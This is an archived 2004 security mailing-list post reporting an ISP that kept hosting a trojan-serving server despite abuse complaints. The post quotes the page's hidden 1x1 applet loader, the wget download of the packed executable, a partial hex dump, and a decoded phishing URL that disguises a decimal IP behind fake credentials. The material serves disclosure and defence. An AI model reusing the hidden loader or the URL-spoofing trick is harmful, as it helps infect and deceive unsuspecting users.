[DShield] ISP freedom? Abraxis.net (was: "Academic Freedom"...)

Erik van Straten emvs.dsh.3FB4CC72 at cpo.tn.tudelft.nl
Wed Feb 18 00:20:49 GMT 2004


List,

If anyone has a contact at Abraxis.net, please wake them up :(

Here's an example of a clueless commercial ISP: Abraxis.net. They are
hosting a server with malicious code, that has been discussed all over
the net for days (see some pointers at the end of this mail), and seem
to refuse to do anything about it, or are too clueless to understand.

A very nice write-up can be found here:
http://spamwatch.codefish.net.au/modules.php?op=modload&name=News&file=article&sid=55
An nmap scan of the probably comprimised abraxis box is here:
http://spamwatch.codefish.net.au/storage/trojan/150204/nmap.txt

Abraxis should help prevent people's PC's from becoming compromised.
Failing to do so, after this has been pointed out more than once (and
probably not just by me) is **bad** and IMO unacceptable Internet
behavior, and may even have legal consequences for Abraxis.

I've contacted abraxis.net via email (both abuse@ and support@) on Sun
2004-02-15 23:59 +0100 (CET), and have responded to both whitelisting
requests, and have received receipt confirmations afterwards. As the
site was still compromised on Monday, I phoned them on 2004-02-16 at
19:18 +0100, nr. 1-770-729-9699. A lady pointed out that I should send
an email; I told her that I had already done that, and that receipts
were comfirmed after I answered their whitelisting requests. She told
me that they were going to look into the matter - I don't know where
they looked, but definitely NOT in the right place:

On 2004-02-18 00:57 +0100 I again downloaded (I meanwhile have a
number of identical copies) http://64.29.173.91/index.html :
| <HTML><BODY bgcolor=white link=#ffffff vlink=#ffffff alink=#ffffff>
| <h2>SERVER ERROR 550</h2>
| <APPLET ARCHIVE="javautil.zip" CODE="BlackBox.class" WIDTH=1
| HEIGHT=1></APPLET></BODY></HTML>

(note: last line was wrapped by me, and that line was withouth CRLF)

wget http://64.29.173.91/javautil.zip
| --00:57:06  http://64.29.173.91/javautil.zip => `javautil.zip'
| [snip]
| 00:57:06 (77.08 KB/s) - `javautil.zip' saved [4736/4736]

Contents of javautil.zip (not a zip, but an exe compressed using FSG):
-------------------------------------------------------------------------
000000  4D 5A 90 00 03 00 00 00 04 00 00 00 50 45 00 00  MZ..........PE..
000010  4C 01 02 00 46 53 47 21 00 00 00 00 00 00 00 00  L...FSG!........
[snip]
000150  E0 00 00 C0 4B 45 52 4E 45 4C 33 32 2E 64 6C 6C  ....KERNEL32.dll
[snip]
-------------------------------------------------------------------------

The offending emails and malware have been extensively discussed on
the full-disclosure list.

I've unpacked the FSG code from javautil.zip, but this is described on
the codefish page mentioned above, so I'll spare you the details.

Final note, Dshield handlers diary mentions:
http://isc.incidents.org/diary.html?date=2004-02-15
> Updated February 15th 2004 21:37 EDT
>
> From the mailbag An e-mail message making the rounds claims that the
> recipient is under "police investigation" and gives a link to follow
> for more information. This link downloads a Trojan onto the user's
> computer. The site (federalpolice.com) is still live at the time of
> this writing.

NOTE: "federalpolice.com" is unrelated, Sam Spade decodes as follows:
----------------------------------------------------------------------
02/18/04 00:59:03 dns http://federalpolice.com:article872@1075686747
http://1075686747 using username federalpolice.com and password article872
Address 1075686747 is 64.29.173.91
nslookup 64.29.173.91
Canonical name: arpa-173.091.atl-001.abraxis.com
Addresses:
  64.29.173.91
----------------------------------------------------------------------

Commercial sites seem to have at least as much freedom as some Academic
institutions...

Regards,
Erik van Straten




More information about the list mailing list